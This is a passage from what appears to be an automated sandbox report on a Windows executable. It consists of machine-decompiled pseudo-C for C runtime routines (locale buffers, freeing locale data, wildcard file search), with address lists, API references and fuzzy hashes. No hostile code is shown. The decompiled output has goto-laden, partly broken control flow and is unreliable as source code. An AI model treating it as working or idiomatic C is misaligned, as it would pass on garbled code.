																	goto L55;
																} else {
																	 *_t103 = 0xdddd;
																	goto L50;
																}
															} else {
																E013C1ED0(_t71);
																_t103 = _t109;
																if(_t103 == 0) {
																	L55:
																	_t85 = _v32;
																} else {
																	 *_t103 = 0xcccc;
																	L50:
																	_t103 = _t103 + 8;
																	L52:
																	if(_t103 == 0 || E013B9CD6(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
																		goto L55;
																	} else {
																		_t85 = _v32;
																		_t102 = E013B6A06(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
																	}
																}
															}
														}
														E013BA94C(_t103);
													}
												}
											}
										}
									}
								}
								E013BA94C(_t85);
								_t60 = _t102;
							}
						}
					}
				}
				L61:
				return E013B1EDB(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
			}

0x013c0079
0x013c0080
0x013c0088
0x013c008b
0x013c0091
0x013c0094
0x013c0097
0x013c009b
0x013c009e
0x013c00a3
0x013c00b8
0x00000000
0x00000000
0x00000000
0x00000000
0x013c00a5
0x013c00ad
0x013c00af
0x013c00be
0x013c00be
0x013c00c3
0x013c00d5
0x00000000
0x00000000
0x00000000
0x00000000
0x013c00c5
0x013c00ce
0x013c00db
0x013c00db
0x013c00e0
0x013c00e7
0x013c00ea
0x013c00ea
0x013c00ef
0x013c00fb
0x013c02e1
0x013c02e1
0x00000000
0x013c0101
0x013c0104
0x013c018d
0x013c018f
0x013c010a
0x013c010d
0x013c0152
0x013c0152
0x00000000
0x013c010f
0x013c011c
0x00000000
0x013c0122
0x013c0124
0x013c015c
0x00000000
0x013c015e
0x013c0162
0x013c0168
0x013c016b
0x013c016d
0x013c0170
0x013c0170
0x013c0175
0x00000000
0x00000000
0x013c0177
0x013c017b
0x013c0185
0x013c018b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013c017b
0x013c0170
0x013c016b
0x00000000
0x013c0162
0x013c0126
0x013c012a
0x013c0130
0x013c0133
0x013c0135
0x013c0135
0x013c013a
0x00000000
0x00000000
0x013c013c
0x013c0140
0x013c014a
0x013c0150
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013c0140
0x013c0135
0x013c0133
0x00000000
0x013c0154
0x013c0154
0x013c0154
0x013c0124
0x013c011c
0x013c010d
0x013c0104
0x013c0195
0x013c0195
0x013c0195
0x013c01a2
0x013c01a7
0x013c01aa
0x013c01af
0x013c02e8
0x013c02e8
0x013c01b5
0x013c01b8
0x013c01bd
0x013c01bf
0x013c01c1
0x013c0204
0x013c0206
0x00000000
0x013c01c3
0x013c01c8
0x013c01e5
0x013c01ea
0x013c01f0
0x00000000
0x013c01f6
0x013c01f6
0x00000000
0x013c01f6
0x013c01ca
0x013c01ca
0x013c01cf
0x013c01d1
0x013c01d6
0x013c02d3
0x013c02d3
0x013c01dc
0x013c01dc
0x013c01fc
0x013c01fc
0x013c01ff
0x013c0209
0x013c020b
0x00000000
0x013c0211
0x013c0219
0x013c021f
0x013c0224
0x013c0229
0x00000000
0x013c022f
0x013c0238
0x013c023d
0x013c0240
0x013c0245
0x00000000
0x013c024b
0x013c024e
0x013c0253
0x013c0255
0x013c0257
0x013c028b
0x00000000
0x013c0259
0x013c025e
0x013c0279
0x013c027e
0x00000000
0x013c0280
0x013c0280
0x00000000
0x013c0280
0x013c0260
0x013c0260
0x013c0265
0x013c0269
0x013c02c7
0x013c02c7
0x013c026b
0x013c026b
0x013c0286
0x013c0286
0x013c028d
0x013c028f
0x00000000
0x013c02aa
0x013c02aa
0x013c02c3
0x013c02c3
0x013c028f
0x013c0269
0x013c025e
0x013c02cb
0x013c02d0
0x013c0245
0x013c0229
0x013c020b
0x013c01d6
0x013c01c8
0x013c02d7
0x013c02dd
0x013c02dd
0x013c01af
0x013c00ef
0x013c00c3
0x013c02ea
0x013c02fb

APIs

GetCPInfo.KERNEL32(00CDEA90,00CDEA90,?,7FFFFFFF,?,?,013C032D,00CDEA90,00CDEA90,?,00CDEA90,?,?,?,?,00CDEA90), ref: 013C0114
__alloca_probe_16.LIBCMT ref: 013C01CA
__alloca_probe_16.LIBCMT ref: 013C0260
__freea.LIBCMT ref: 013C02CB
__freea.LIBCMT ref: 013C02D7

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: f9a47cd4602f6f395876c50c28065bf029d385b61a159388212ea825b8c090d2
Instruction ID: ba8fd10444af5d74d249b78b44c5cc6540d069bbde9e416d9d826a92776c0334
Opcode Fuzzy Hash: f9a47cd4602f6f395876c50c28065bf029d385b61a159388212ea825b8c090d2
Instruction Fuzzy Hash: 1C81A97AD0029ADBDF259F998880AEE7BBA9F49A5CF05015DFA14B7240E625CD40C760

Uniqueness

Uniqueness Score: -1.00%

Function 013BA6A0 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013BA6A0(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x13ca720; // 0x13ca770
					if(_t23 != 0) {
						E013B67BB(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x13ca724; // 0x13d9ce8
					if(_t24 != 0) {
						E013B67BB(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x13ca728; // 0x13d9ce8
					if(_t25 != 0) {
						E013B67BB(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x13ca750; // 0x13ca774
					if(_t26 != 0) {
						E013B67BB(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x13ca754; // 0x13d9cec
					if(_t27 != 0) {
						return E013B67BB(_t6);
					}
				}
				return _t6;
			}

0x013ba6a6
0x013ba6ab
0x013ba6af
0x013ba6b5
0x013ba6b8
0x013ba6bd
0x013ba6c1
0x013ba6c7
0x013ba6ca
0x013ba6cf
0x013ba6d3
0x013ba6d9
0x013ba6dc
0x013ba6e1
0x013ba6e5
0x013ba6eb
0x013ba6ee
0x013ba6f3
0x013ba6f4
0x013ba6f7
0x013ba6fd
0x00000000
0x013ba705
0x013ba6fd
0x013ba708

APIs

_free.LIBCMT ref: 013BA6B8

Part of subcall function 013B67BB: HeapFree.KERNEL32(00000000,00000000,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?), ref: 013B67D1
Part of subcall function 013B67BB: GetLastError.KERNEL32(?,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?,?), ref: 013B67E3

_free.LIBCMT ref: 013BA6CA
_free.LIBCMT ref: 013BA6DC
_free.LIBCMT ref: 013BA6EE
_free.LIBCMT ref: 013BA700

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0ab82b83ff2ec60a9d5b3ff5c57ab42313d37847d928237a6a152e9c23f8ad45
Instruction ID: 36d65f1d5909031aac49f5251fc37f5fc590fb6de5b74f9090677ca38a58671e
Opcode Fuzzy Hash: 0ab82b83ff2ec60a9d5b3ff5c57ab42313d37847d928237a6a152e9c23f8ad45
Instruction Fuzzy Hash: B0F068B2504504ABD530EAACE1DBD8577EDFA44B647580809FB06D7D00FF34F8814B54

Uniqueness

Uniqueness Score: -1.00%

Function 013B8C61 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E013B8C61(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E013B547A(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E013BE9B1(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E013B4FA2();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E013B675E(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E013BE9B1(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E013B924B(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E013B67BB(_t300);
														_t302 = _v12;
													}
													E013B67BB(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E013BE9B1(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E013B4FA2();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x13ca014; // 0xfcb69da6
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E013BEA00(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E013B8C44(_t244 - _t287 + 1, _t287,  &_v676, E013B9158(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E013B8B75( &(_v608.cFileName),  &_v640,  &_v609, E013B9158(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E013B67BB(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E013B67BB(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E013BE410(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E013B8AAB);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E013B67BB(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E013B1EDB(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E013B67BB(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E013BE9C0(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E013B67BB( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E013B67BB(_t283);
						goto L31;
					}
				} else {
					_t219 = E013B674B(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E013B4F75();
					L31:
					return _t297;
				}
				L81:
			}

0x013b8c66
0x013b8c69
0x013b8c6c
0x013b8c6d
0x013b8c6f
0x013b8c85
0x013b8c89
0x013b8c8c
0x013b8c8e
0x013b8c90
0x013b8c92
0x013b8c94
0x013b8c97
0x013b8c9a
0x013b8c9d
0x013b8c9f
0x013b8d02
0x013b8d04
0x013b8d07
0x013b8d09
0x013b8d0d
0x013b8d16
0x013b8d17
0x013b8d1a
0x013b8d1c
0x013b8d1f
0x013b8d23
0x013b8d23
0x013b8d25
0x013b8d27
0x013b8d29
0x013b8d2b
0x013b8d2b
0x013b8d2d
0x013b8d30
0x013b8d33
0x013b8d33
0x013b8d35
0x013b8d36
0x013b8d36
0x013b8d41
0x013b8d43
0x013b8d46
0x013b8d47
0x013b8d4a
0x013b8d4a
0x013b8d4e
0x013b8d51
0x013b8d54
0x013b8d54
0x013b8d54
0x013b8d61
0x013b8d63
0x013b8d66
0x013b8d68
0x013b8d80
0x013b8d83
0x013b8d86
0x013b8d88
0x013b8d8b
0x013b8d8d
0x013b8d90
0x013b8d93
0x013b8df0
0x013b8df3
0x013b8df6
0x013b8df8
0x00000000
0x013b8d95
0x013b8d97
0x013b8d97
0x013b8d99
0x013b8d9c
0x013b8d9c
0x013b8d9e
0x013b8da0
0x013b8da6
0x013b8da9
0x013b8da9
0x013b8dab
0x013b8dac
0x013b8dac
0x013b8db3
0x013b8db6
0x013b8dba
0x013b8dc7
0x013b8dcc
0x013b8dcf
0x013b8dd1
0x013b8e45
0x013b8e46
0x013b8e47
0x013b8e48
0x013b8e49
0x013b8e4a
0x013b8e4f
0x013b8e53
0x013b8e55
0x013b8e56
0x013b8e59
0x013b8e59
0x013b8e5c
0x013b8e5c
0x013b8e5e
0x013b8e5f
0x013b8e5f
0x013b8e63
0x013b8e64
0x013b8e6b
0x013b8e6e
0x013b8e71
0x013b8e73
0x013b8e7b
0x013b8e7c
0x013b8e7d
0x013b8e80
0x013b8e8a
0x013b8e8e
0x013b8e90
0x013b8ea4
0x013b8ea4
0x013b8ea7
0x013b8eb1
0x013b8eb6
0x013b8eb9
0x013b8ebb
0x00000000
0x013b8ebd
0x013b8ebd
0x013b8ec2
0x013b8ec9
0x013b8ecc
0x013b8ece
0x013b8edf
0x013b8ee1
0x013b8ee3
0x013b8ee3
0x013b8ee3
0x013b8ed0
0x013b8ed1
0x013b8ed6
0x013b8ed9
0x013b8ee8
0x013b8eee
0x00000000
0x013b8ef1
0x013b8e92
0x013b8e92
0x013b8e98
0x013b8e9d
0x013b8ea0
0x013b8ea2
0x013b8ef4
0x013b8ef6
0x013b8ef7
0x013b8ef8
0x013b8ef9
0x013b8efa
0x013b8efb
0x013b8f00
0x013b8f03
0x013b8f04
0x013b8f06
0x013b8f0c
0x013b8f13
0x013b8f16
0x013b8f19
0x013b8f1c
0x013b8f1d
0x013b8f1e
0x013b8f21
0x013b8f27
0x013b8f29
0x013b8f2b
0x013b8f2b
0x013b8f2d
0x013b8f2f
0x00000000
0x00000000
0x013b8f31
0x013b8f33
0x013b8f35
0x013b8f37
0x013b8f42
0x013b8f44
0x013b8f46
0x00000000
0x00000000
0x013b8f46
0x013b8f37
0x00000000
0x013b8f33
0x013b8f48
0x013b8f48
0x013b8f4e
0x013b8f50
0x013b8f56
0x013b8f58
0x013b8f7a
0x013b8f7a
0x013b8f7c
0x013b8f7e
0x013b8f8a
0x013b8f8a
0x013b8f80
0x013b8f80
0x013b8f82
0x00000000
0x013b8f84
0x013b8f84
0x013b8f86
0x013b8f88
0x00000000
0x00000000
0x013b8f88
0x013b8f82
0x013b8f92
0x013b8f9a
0x013b8fa0
0x013b8fa1
0x013b8fa3
0x013b8fab
0x013b8fb1
0x013b8fb7
0x013b8fbd
0x013b8fd1
0x013b8fd6
0x013b8fe1
0x013b8ff1
0x013b8ff7
0x013b8ff9
0x013b8ffc
0x013b901f
0x013b901f
0x013b9024
0x013b902a
0x013b902a
0x013b9030
0x013b9036
0x013b903c
0x013b9042
0x013b9048
0x013b9069
0x013b906e
0x013b9073
0x013b9077
0x013b907d
0x013b9080
0x013b9093
0x013b9093
0x013b9099
0x013b909f
0x013b90a0
0x013b90a1
0x013b90a6
0x013b90a9
0x013b90af
0x013b90b1
0x013b910f
0x013b9115
0x013b911d
0x013b9122
0x013b9128
0x013b9129
0x00000000
0x00000000
0x00000000
0x013b9082
0x013b9082
0x013b9085
0x013b9087
0x00000000
0x013b9089
0x013b9089
0x013b908c
0x00000000
0x013b908e
0x013b908e
0x013b9091
0x00000000
0x00000000
0x00000000
0x00000000
0x013b9091
0x013b908c
0x013b9087
0x013b912b
0x013b912c
0x00000000
0x013b90b3
0x013b90b3
0x013b90b9
0x013b90c1
0x013b90c6
0x013b90d5
0x013b90d5
0x013b90dd
0x013b90e3
0x013b90e9
0x013b90f0
0x013b90f3
0x013b90f5
0x013b9105
0x013b910a
0x00000000
0x013b8ffe
0x013b8ffe
0x013b9004
0x013b9005
0x013b9006
0x013b9007
0x013b900f
0x013b900f
0x013b9132
0x013b9132
0x013b9139
0x013b913a
0x013b9142
0x013b9147
0x013b9148
0x013b8f5a
0x013b8f5a
0x013b8f5d
0x013b8f5f
0x013b8f74
0x00000000
0x013b8f61
0x013b8f61
0x013b8f64
0x013b8f65
0x013b8f66
0x013b8f67
0x013b8f6c
0x013b8f5f
0x013b914d
0x013b914e
0x013b9150
0x013b9157
0x00000000
0x00000000
0x00000000
0x013b8ea2
0x013b8e75
0x013b8e77
0x013b8e78
0x013b8e7a
0x013b8e7a
0x00000000
0x00000000
0x00000000
0x00000000
0x013b8dd3
0x013b8dd3
0x013b8dd9
0x013b8ddc
0x013b8ddf
0x013b8de2
0x013b8de5
0x013b8de8
0x013b8deb
0x013b8deb
0x00000000
0x013b8d9c
0x013b8d6a
0x013b8d6a
0x013b8d6d
0x013b8dfa
0x013b8dfb
0x013b8e00
0x00000000
0x013b8e00
0x013b8ca1
0x013b8ca1
0x013b8ca4
0x013b8cac
0x013b8caf
0x013b8cb6
0x013b8cb8
0x013b8cba
0x013b8cd5
0x013b8cd6
0x013b8cd7
0x013b8cd8
0x013b8cdd
0x013b8ce0
0x013b8ce3
0x013b8cbc
0x013b8cbc
0x013b8cbf
0x013b8cc0
0x013b8cc1
0x013b8cc2
0x013b8cc3
0x013b8cc8
0x013b8cca
0x013b8ccd
0x013b8ccd
0x013b8ce5
0x013b8ce7
0x00000000
0x00000000
0x013b8cf0
0x013b8cf3
0x013b8cf6
0x013b8cf8
0x013b8cfa
0x00000000
0x013b8cfc
0x013b8cfc
0x013b8cff
0x00000000
0x013b8cff
0x00000000
0x013b8cfa
0x013b8d75
0x013b8e01
0x013b8e04
0x013b8e08
0x013b8e11
0x013b8e14
0x013b8e18
0x013b8e18
0x013b8e1a
0x013b8e1d
0x013b8e1f
0x013b8e21
0x013b8e23
0x013b8e28
0x013b8e29
0x013b8e2d
0x013b8e2d
0x013b8e31
0x013b8e34
0x013b8e34
0x013b8e38
0x00000000
0x013b8e3f
0x013b8c71
0x013b8c71
0x013b8c78
0x013b8c79
0x013b8c7b
0x013b8e40
0x013b8e44
0x013b8e44
0x00000000

APIs

_free.LIBCMT ref: 013B8DFB

Strings

